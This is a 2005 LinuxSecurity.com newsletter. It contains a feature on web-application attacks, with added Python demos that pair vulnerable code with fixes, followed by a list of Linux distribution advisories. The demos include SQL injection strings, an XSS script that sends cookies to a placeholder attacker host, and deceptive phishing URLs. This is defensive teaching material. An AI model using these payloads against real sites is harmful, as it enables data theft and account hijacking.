Linux Advisory Watch: March 4th 2005
Source: LinuxSecurity.com Contributors - Posted by Benjamin D. Thomas
Linux Advisory Watch: This week, advisories were released for mod_python, bsmtpd, gaim, bind, gnucash, dhcp, at, vixie-cron, lam, pvm, radvd, selinux-policy-targeted, tcsh, openoffice, gamin, cmd5checkpw, uim, UnAce, MediaWiki, phpBB, phpWebSite, xli, xloadimage, firefox, squid, kdenetwork, nvidia, curl, uw-imap, and cyrus-sasl. The distributors include Conectiva, Debian, Fedora, Gentoo, Red Hat, and SuSE.



VULNERABILITIES IN WEB APPLICATIONS
By Raymond Ankobia

This is by no means an exhaustive list, but an indication of some of the serious flaws exploited by hackers. Hacking Exposed: Web Applications (ISBN 007222438X) is a good source on the subject area.

Buffer Overflow Attack: Usually perpetrated as a stack, heap or format string attack [3]. Without doubt one of the oldest problems caused by poor programming, yet such attacks continue on a large scale, simply because web applications lack rigorous input-handling routines. To get the system to run their own code, attackers supply an input string, often carrying a malicious payload, that is longer than the memory space assigned to it [7]. The excess spills over into adjacent memory (on the stack, neighbouring variables and the saved return address), overwriting what was originally there. If the overwritten return address now points at the attacker's payload, that payload executes and may subvert the system and escalate whatever privileges the process holds.

SQL Injection Attack: Most e-commerce web sites use dynamic content to attract potential customers, displaying their wares through dynamic SQL queries driven by front-end scripts. Where user input is concatenated into such a query, an attacker can inject special characters and SQL commands and change the meaning of the intended query, for example by chaining additional conditions or statements to provoke unexpected behaviour. Not only may the attacker read the entire database, but in some circumstances also alter the prices of the goods on sale.
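The injection described above, as an added example that is not part of the original feature: a product search built by string concatenation beside the same search with a bound parameter, run against a constructed in-memory SQLite catalogue (the table names, rows and password hash are made up for the demonstration).

```python
import sqlite3

def build_catalogue():
    # Constructed in-memory shop database for the demonstration (not real data).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products (name, price) VALUES
            ('widget', 9.99), ('gadget', 24.50), ('gizmo', 120.00);
        CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pwhash TEXT);
        INSERT INTO users (login, pwhash) VALUES
            ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db

def search_vulnerable(db, name):
    # Vulnerable: the search term is pasted into the SQL text, so quotes and
    # keywords inside it are parsed as SQL instead of being treated as a value.
    sql = "SELECT name, price FROM products WHERE name = '" + name + "'"
    return db.execute(sql).fetchall()

def search_safe(db, name):
    # Fixed: the term is bound as a parameter. The query structure is fixed
    # before the database ever sees the user's data, so a quote is just a quote.
    sql = "SELECT name, price FROM products WHERE name = ?"
    return db.execute(sql, (name,)).fetchall()

# Two "product names" an attacker might type into the search box.
# The trailing -- comments out the closing quote the application appends.
TAUTOLOGY  = "' OR 1=1 --"                                 # returns every product
UNION_READ = "' UNION SELECT login, pwhash FROM users --"  # reads a different table

if __name__ == "__main__":
    db = build_catalogue()
    print("honest search   :", search_vulnerable(db, "widget"))
    print("tautology       :", search_vulnerable(db, TAUTOLOGY))
    print("union read      :", search_vulnerable(db, UNION_READ))
    print("safe, tautology :", search_safe(db, TAUTOLOGY))
```

The tautology leaks the whole products table and the UNION pulls the administrator's password hash out of an unrelated table, while the parameterised version returns nothing for either string. Python's sqlite3 module refuses stacked statements in execute(), which is why the price-altering case (appending an UPDATE after a semicolon) is not shown here; many other database drivers accept it.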

Cross Site Scripting Attack (XSS): This attack is executed by embedding malicious script in an HTML form [4] [3] and posting it as a message to, say, a newsgroup or bulletin board. When another user views the message, the browser interprets and executes the embedded code, triggering its payload (for example, sending the viewer's session cookie to the attacker) with that user's privileges on the site.
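A minimal bulletin-board renderer showing the stored XSS above, added here as an example and not taken from the feature: the same posts rendered raw and rendered through html.escape, in both element and attribute context. The posts and the evil.example host are constructed for the demonstration.

```python
import html

# Constructed sample bulletin-board posts; the second one carries a script that
# ships every viewer's cookie to a placeholder attacker host.
POSTS = [
    "Has anyone read the latest advisory watch?",
    '<script>new Image().src="http://evil.example/c?"+document.cookie</script>',
]

def render_unescaped(post):
    # Vulnerable: the stored message is dropped into the page exactly as posted,
    # so markup inside it becomes part of the page and runs in every viewer's browser.
    return "<li>" + post + "</li>"

def render_escaped(post):
    # html.escape turns < > & " ' into entities, so the browser displays the text
    # of the post instead of interpreting it as markup.
    return "<li>" + html.escape(post, quote=True) + "</li>"

def render_attribute_unescaped(value):
    # Same bug in an attribute context: a double quote in the value closes the
    # attribute and whatever follows becomes a new attribute, e.g. an event handler.
    return '<input type="text" name="subject" value="' + value + '">'

def render_attribute_escaped(value):
    # quote=True is what makes html.escape safe inside a quoted attribute value.
    return '<input type="text" name="subject" value="' + html.escape(value, quote=True) + '">'

def has_live_markup(rendered):
    # Crude check for the demonstration only: did a script element or an
    # onmouseover handler survive rendering as real markup?
    lowered = rendered.lower()
    return "<script" in lowered or ' onmouseover="' in lowered

# Constructed payload aimed at the attribute context: closes value="..." early.
ATTRIBUTE_PAYLOAD = 'x" onmouseover="alert(document.cookie)'

if __name__ == "__main__":
    for post in POSTS:
        print(render_unescaped(post))
        print(render_escaped(post))
    print(render_attribute_unescaped(ATTRIBUTE_PAYLOAD))
    print(render_attribute_escaped(ATTRIBUTE_PAYLOAD))
```

Escaping on output, at the point where the text meets the HTML, is what matters; filtering on input alone misses data that reaches the page by another route, and the correct escaping differs between element content, attributes, URLs and script blocks.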

Input Validation Attack: Typically the first thing active attackers check is whether validation of form fields is performed only on the client side; if so, they tamper with the submitted values and then try to escalate whatever access they gain [3]. Validation done only in the client (typically a web browser) is trivially bypassed, since the attacker controls every parameter sent to the server. The server is also compromised if it implicitly trusts those parameters and performs little or no validation of its own.
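An added example of the parameter tampering described above (not code from the feature): a checkout that trusts a client-supplied price and quantity, beside one that re-validates every parameter on the server and takes the price from its own catalogue. The SKUs, prices and form submissions are constructed for the demonstration.

```python
from decimal import Decimal

# Constructed server-side catalogue (not real data). Prices live here, not in the form.
CATALOGUE = {"widget": Decimal("9.99"), "gadget": Decimal("24.50")}

class ValidationError(ValueError):
    """Raised when a submitted parameter fails server-side checks."""

def checkout_trusting_client(form):
    # Vulnerable: the price arrives in a hidden field that client-side JavaScript
    # "validated". Anyone can edit that field, or the quantity, before submitting.
    qty = int(form["qty"])
    price = Decimal(form["price"])
    return qty * price

def checkout_server_validated(form):
    # Fixed: every parameter is re-checked here, and the price is never read from
    # the client at all; it is looked up from the catalogue by SKU.
    sku = form.get("sku", "")
    if sku not in CATALOGUE:
        raise ValidationError("unknown sku")
    qty_raw = form.get("qty", "")
    # ASCII digits only: rejects '', '-2', '2.5', '1e9', '2;--' and non-ASCII numerals
    if not (qty_raw.isascii() and qty_raw.isdigit()):
        raise ValidationError("qty must be a whole number")
    qty = int(qty_raw)
    if not 1 <= qty <= 100:
        raise ValidationError("qty out of range")
    return qty * CATALOGUE[sku]

def rejects(form):
    # Helper: True if the validated checkout refuses the submission.
    try:
        checkout_server_validated(form)
    except ValidationError:
        return True
    return False

# Constructed submissions: what the shop's own page sends, and two tampered copies.
HONEST   = {"sku": "gadget", "qty": "2",  "price": "24.50"}
UNDERCUT = {"sku": "gadget", "qty": "2",  "price": "0.01"}   # hidden price field edited
NEGATIVE = {"sku": "gadget", "qty": "-2", "price": "24.50"}  # negative quantity = a refund

if __name__ == "__main__":
    for label, form in (("honest", HONEST), ("undercut", UNDERCUT), ("negative", NEGATIVE)):
        print(label, "trusting:", checkout_trusting_client(form),
              "validated:", "rejected" if rejects(form) else checkout_server_validated(form))
```

The tampered submissions charge 0.02 and -49.00 through the trusting version; the validated version charges the catalogue price for the first and refuses the second outright.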

Phishing Attack: This attack is often helped along by display flaws in some versions of web browsers. Attackers create bogus websites that masquerade as legitimate commercial ones. They normally operate by sending spoofed emails to unsuspecting customers, advising them to visit their bank's website to reactivate or update their accounts. The addresses embedded in these emails tend to contain cleverly constructed hidden characters that make the link appear to point at a legitimate page. On clicking the embedded link, the unsuspecting user lands on a fake website where bank account credentials and details are collected and later used to empty the accounts.

[4] This anomaly comes from the way URLs are parsed. The host part may be written in decimal, hexadecimal or dword form, and anything between the scheme and an @ sign is treated as user information rather than as the host. A particular vulnerability in Internet Explorer allowed an attacker to hide the true destination behind a specially constructed @ prefix, so that the link appeared to point at a legitimate site while the browser connected elsewhere.
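The two tricks in the note above, worked through with Python's standard URL parser as an added example (not from the feature): the @ sign that turns the visible "bank" name into userinfo, and integer-encoded hosts. www.bank.example and evil.example are placeholder names, and 192.0.2.235 (decimal 3221226219, hex 0xC00002EB) is taken from the documentation address range, so none of these point at real systems.

```python
import ipaddress
from urllib.parse import urlsplit

def real_host(url):
    # urlsplit treats everything before the last '@' in the authority as
    # userinfo; .hostname is what the browser actually connects to, whatever
    # the reader "sees" in front of the @.
    return urlsplit(url).hostname

def canonical_host(host):
    """Turn decimal, hex or octal integer forms of an IPv4 address into dotted quad.
    Hostnames that are not integer-encoded addresses are returned unchanged."""
    try:
        n = int(host, 0)   # accepts '3221226219', '0xC00002EB', '0o30000001353'
    except ValueError:
        return host
    if 0 <= n <= 0xFFFFFFFF:
        return str(ipaddress.IPv4Address(n))
    return host

def true_destination(url):
    # Where a link really goes: strip the userinfo decoy, then decode an
    # integer-encoded host. Returns None for URLs with no host at all.
    host = real_host(url)
    return canonical_host(host) if host else None

# Constructed links of the kind described in the note (placeholder hosts only).
LINKS = [
    "http://www.bank.example/login",                      # genuine
    "http://www.bank.example@evil.example/login",         # '@' decoy
    "http://www.bank.example:update@3221226219/login",    # decoy plus dword host
    "http://0xC00002EB/login",                            # hex-encoded host
]

if __name__ == "__main__":
    for link in LINKS:
        print(link, "->", true_destination(link))
```

Displaying true_destination() next to a link, rather than the raw URL, is the check a mail gateway or a cautious user wants; note that int(host, 0) deliberately rejects a bare leading zero such as "010", so classic octal notation has to be written with the 0o prefix to be decoded here.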

Mobile Code: The most common technologies used to develop mobile code include Java, ActiveX controls and Shockwave. Traditionally the programme is downloaded from a web server onto the customer's machine and executed in a virtual machine (inside the browser) or a downloadable plug-in. Such programmes can be maliciously crafted to subvert the security of the system and its functionality, causing crashes and disrupting the normal operating environment.

Insecure Configuration Management: The end points of the communicating parties, especially their web servers, are poorly configured. Often ignored, this is the area most attacked by hackers as a way of bypassing the protection offered by encryption and other security mechanisms [4]. Apache and IIS dominate commercial deployment of web servers, and some earlier releases are riddled with bugs. Simply installing these applications with default settings is bad practice: poorly written sample scripts shipped with them are exploited by attackers, who may easily take control of the server's resources.

Google Hacking: Google's search engine traverses the Internet, crawling websites, taking a snapshot of each web page it examines and caching the result. When a query is received, the search is performed over these cached pages, allowing faster retrieval [4]. Hackers mine these caches for vulnerable sites. The mechanism is explained in great depth in a white paper from Foundstone (www.foundstone.com) describing their tool SiteDigger. Tools such as these are the Swiss army knives of hackers: using search engines, they find exposed vulnerability scanning reports, intrusion detection alerts and log files, which are then used to pick suitable targets to exploit.

Read full feature:
http://www.linuxsecurity.com/content/view/118427/49/

 

LinuxSecurity.com Feature Extras:

Getting to Know Linux Security: File Permissions - Welcome to the first tutorial in the 'Getting to Know Linux Security' series. The topic explored is Linux file permissions. It offers an easy to follow explanation of how to read permissions, and how to set them using chmod. This guide is intended for users new to Linux security, therefore very simple. If the feedback is good, I'll consider creating more complex guides for advanced users. Please let us know what you think and how these can be improved.

The Tao of Network Security Monitoring: Beyond Intrusion Detection - To be honest, this was one of the best books that I've read on network security. Others books often dive so deeply into technical discussions, they fail to provide any relevance to network engineers/administrators working in a corporate environment. Budgets, deadlines, and flexibility are issues that we must all address. The Tao of Network Security Monitoring is presented in such a way that all of these are still relevant.

Encrypting Shell Scripts - Do you have scripts that contain sensitive information like passwords and you pretty much depend on file permissions to keep it secure? If so, then that type of security is good provided you keep your system secure and some user doesn't have a "ps -ef" loop running in an attempt to capture that sensitive info (though some applications mask passwords in "ps" output).

 


Take advantage of our Linux Security discussion list! This mailing list is for general security-related questions and comments. To subscribe send an e-mail to security-discuss-request@linuxsecurity.com with "subscribe" as the subject.

Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headline.


   Conectiva
  Conectiva: mod_python Fix for mod_python vulnerability
  2nd, March, 2005

The package mod_python[1] provides an Apache module that embeds the Python interpreter within the server. This announcement fixes an information leak vulnerability[2] in mod_python which could allow a remote attacker to obtain access to restricted objects via a specially crafted URL.

http://www.linuxsecurity.com/content/view/118467
 
   Debian
  Debian: New bsmtpd packages fix arbitrary command execution
  25th, February, 2005

Updated package.

http://www.linuxsecurity.com/content/view/118432
 
   Fedora
  Fedora Core 2 Update: gaim-1.1.4-0.FC2
  25th, February, 2005

This update resolves another DoS issue in parsing malformed HTML, and a MSN related crash that folks were hitting often.

http://www.linuxsecurity.com/content/view/118433
 
  Fedora Core 3 Update: gaim-1.1.4-0.FC3
  25th, February, 2005

This update resolves another DoS issue in parsing malformed HTML, and a MSN related crash that folks were hitting often.

http://www.linuxsecurity.com/content/view/118434
 
  Fedora Core 3 Update: bind-9.2.5rc1-1
  25th, February, 2005

Upgraded to ISC BIND version 9.2.5rc1. Added support for LDAP, PostgreSQL and filesystem Simplified Database Backends (SDB) with the bind-sdb package, and for development with libbind, the BIND 8 compatible resolver library, with the bind-libbind-devel package. Fixed various bugs (see ChangeLog below).

http://www.linuxsecurity.com/content/view/118435
 
  Fedora Core 3 Update: gnucash-1.8.11-0.fc3
  25th, February, 2005

This update updates gnucash to the latest upstream release, 1.8.11. This also includes: - update of libofx to 0.7.0 - switching of the HBCI backend from openhbci to gwenhywfar/aqbanking/aqhbci

http://www.linuxsecurity.com/content/view/118436
 
  Fedora Core 3 Update: dhcp-3.0.1-40_FC3
  25th, February, 2005

Updated package.

http://www.linuxsecurity.com/content/view/118437
 
  Fedora Core 3 Update: at-3.1.8-64_FC3
  25th, February, 2005

at(1) now supports access control with PAM (limits.conf, access.conf).

http://www.linuxsecurity.com/content/view/118438
 
  Fedora Core 3 Update: vixie-cron-4.1-24_FC3
  25th, February, 2005

Updated package.

http://www.linuxsecurity.com/content/view/118439
 
  Fedora Core 3 Update: lam-7.1.1-1_FC3
  25th, February, 2005

Updated package.

http://www.linuxsecurity.com/content/view/118440
 
  Fedora Core 3 Update: pvm-3.4.5-2_FC3
  25th, February, 2005

Updated package.

http://www.linuxsecurity.com/content/view/118441
 
  Fedora Core 3 Update: radvd-0.7.3-1_FC3
  25th, February, 2005

Upgrade to new upstream version 0.7.3.

http://www.linuxsecurity.com/content/view/118442
 
  Fedora Core 3 Update: selinux-policy-targeted-1.17.30-2.83
  28th, February, 2005

Updated packages.

http://www.linuxsecurity.com/content/view/118448
 
  Fedora Core 3 Update: firefox-1.0.1-1.3.1
  28th, February, 2005

This update fixes several security vulnerabilities in Firefox 1.0. It is recommended that all users update to Firefox 1.0.1. Additionally, this update backports several fixes from rawhide.

http://www.linuxsecurity.com/content/view/118449
 
  Fedora Core 3 Update: tcsh-6.13-10.FC3.1
  28th, February, 2005

This update fixes incorrect message output under certain locales in new mail notification, changing resource limits and listing possible completions.

http://www.linuxsecurity.com/content/view/118450
 
  Fedora Core 3 Update: openoffice.org-1.1.3-6.5.0.fc3
  28th, February, 2005

Fix individual programs not launching.

http://www.linuxsecurity.com/content/view/118451
 
  Fedora Core 3 Update: gamin-0.0.25-1.FC3
  2nd, March, 2005

This release fixes some problems with gamin-0.0.24 especially for temporary storage like USB keys.

http://www.linuxsecurity.com/content/view/118469
 
   Gentoo
  Gentoo: cmd5checkpw Local password leak vulnerability
  25th, February, 2005

cmd5checkpw contains a flaw allowing local users to access other users cmd5checkpw passwords.

http://www.linuxsecurity.com/content/view/118443
 
  Gentoo: uim Privilege escalation vulnerability
  28th, February, 2005

Under certain conditions, applications linked against uim suffer from a privilege escalation vulnerability.

http://www.linuxsecurity.com/content/view/118446
 
  Gentoo: UnAce Buffer overflow and directory traversal vulnerabilities
  28th, February, 2005

UnAce is vulnerable to several buffer overflow and directory traversal attacks.

http://www.linuxsecurity.com/content/view/118447
 
  Gentoo: MediaWiki Multiple vulnerabilities
  28th, February, 2005

MediaWiki is vulnerable to cross-site scripting, data manipulation and security bypass attacks.

http://www.linuxsecurity.com/content/view/118452
 
  Gentoo: phpBB Multiple vulnerabilities
  1st, March, 2005

Several vulnerabilities allow remote attackers to gain phpBB administrator rights or expose and manipulate sensitive data.

http://www.linuxsecurity.com/content/view/118461
 
  Gentoo: Gaim Multiple Denial of Service issues
  1st, March, 2005

Multiple vulnerabilities have been found in Gaim which could allow a remote attacker to crash the application.

http://www.linuxsecurity.com/content/view/118463
 
  Gentoo: phpWebSite Arbitrary PHP execution and path disclosure
  1st, March, 2005

Remote attackers can upload and execute arbitrary PHP scripts, another flaw reveals the full path of scripts.

http://www.linuxsecurity.com/content/view/118464
 
  Gentoo: xli, xloadimage Multiple vulnerabilities
  2nd, March, 2005

xli and xloadimage are vulnerable to multiple issues, potentially leading to the execution of arbitrary code.

http://www.linuxsecurity.com/content/view/118470
 
   Red Hat
  RedHat: Critical: firefox security update
  1st, March, 2005

Updated firefox packages that fix various bugs are now available. This update has been rated as having critical security impact by the Red Hat Security Response Team.

http://www.linuxsecurity.com/content/view/118462
 
  RedHat: Moderate: squid security update
  3rd, March, 2005

Updated squid packages that fix a denial of service issue are now available. This update has been rated as having important security impact by the Red Hat Security Response Team.

http://www.linuxsecurity.com/content/view/118476
 
  RedHat: Low: kdenetwork security update
  3rd, March, 2005

Updated kdenetwork packages that fix a file descriptor leak are now available. This update has been rated as having low security impact by the Red Hat Security Response Team.

http://www.linuxsecurity.com/content/view/118477
 
   SuSE
  SuSE: kernel / nvidia bugfix update
  25th, February, 2005

The previous kernel security update for the SUSE Linux 9.1 and the SUSE Linux Enterprise Server 9 based products caused problems with the NVidia driver for users with NVidia graphics cards.

http://www.linuxsecurity.com/content/view/118431
 
  SuSE: curl buffer overflow in NTLM
  28th, February, 2005

infamous41md@hotpop.com reported a vulnerability in libcurl, the HTTP/FTP retrieval library. This library is used by lots of programs, including YaST2 and PHP4.

http://www.linuxsecurity.com/content/view/118445
 
  SuSE: uw-imap authentication bypass
  1st, March, 2005

The University of Washington imap daemon can be used to access mail remotely using the IMAP protocol. This update fixes a logical error in the CRAM-MD5 challenge-response authentication mechanism used by UW IMAP. Due to this mistake a remote attacker can gain access to the IMAP server as an arbitrary user.

http://www.linuxsecurity.com/content/view/118456
 
  SuSE: cyrus-sasl remote code execution
  3rd, March, 2005

A buffer overflow in the digestmd5 code was identified that could lead to a remote attacker executing code in the context of the service using SASL authentication.

http://www.linuxsecurity.com/content/view/118472
 
